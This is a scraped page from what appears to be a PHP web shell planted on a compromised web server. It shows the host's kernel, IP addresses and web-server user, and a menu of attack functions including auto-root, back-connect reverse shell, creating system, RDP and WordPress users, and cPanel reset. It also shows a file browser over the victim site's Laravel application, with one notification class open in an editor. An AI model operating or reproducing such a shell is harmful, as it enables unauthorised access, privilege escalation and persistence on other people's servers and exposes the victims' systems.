Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
app /
Notifications /
[ HOME SHELL ]
Name
Size
Permission
Action
BackToStore.php
1.52
KB
-rw-rw-r--
CylinderReceived.php
1.6
KB
-rw-rw-r--
MaskReceived.php
1.54
KB
-rw-rw-r--
MaskRepaired.php
1.51
KB
-rw-rw-r--
OrderReceived.php
1.59
KB
-rw-rw-r--
RegulatorReceived.php
1.75
KB
-rw-rw-r--
RegulatorRepaired.php
1.49
KB
-rw-rw-r--
RepairConfirmation.php
1.54
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RegulatorReceived.php
<?php namespace App\Notifications; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldQueue; use Illuminate\Notifications\Messages\MailMessage; use Illuminate\Notifications\Notification; use App\Models\ReceiveRg as ReceiveRg; class RegulatorReceived extends Notification { use Queueable; private $receive_rg; /** * Create a new notification instance. * * @return void */ public function __construct(ReceiveRg $receive_rg) { $this->receive_rg = $receive_rg; } /** * Get the notification's delivery channels. * * @param mixed $notifiable * @return array */ public function via($notifiable) { // return ['mail']; return['database']; } // public functon toDatabase($notifiable) // { // return[ // 'receive_rg' =>$this->receive_rg // ]; // } public function toDatabase($notifiable) { return [ 'receive_rg'=>$this->receive_rg ]; } /** * Get the mail representation of the notification. * * @param mixed $notifiable * @return \Illuminate\Notifications\Messages\MailMessage */ public function toMail($notifiable) { $url = url('admin/receive-regulator/details/'.$this->receive_rg->id); return (new MailMessage) ->line('New Regulator Received.') ->action('Notification Action', $url) ->line('Thank you for using our application!'); } /** * Get the array representation of the notification. * * @param mixed $notifiable * @return array */ public function toArray($notifiable) { return [ // ]; } }
Close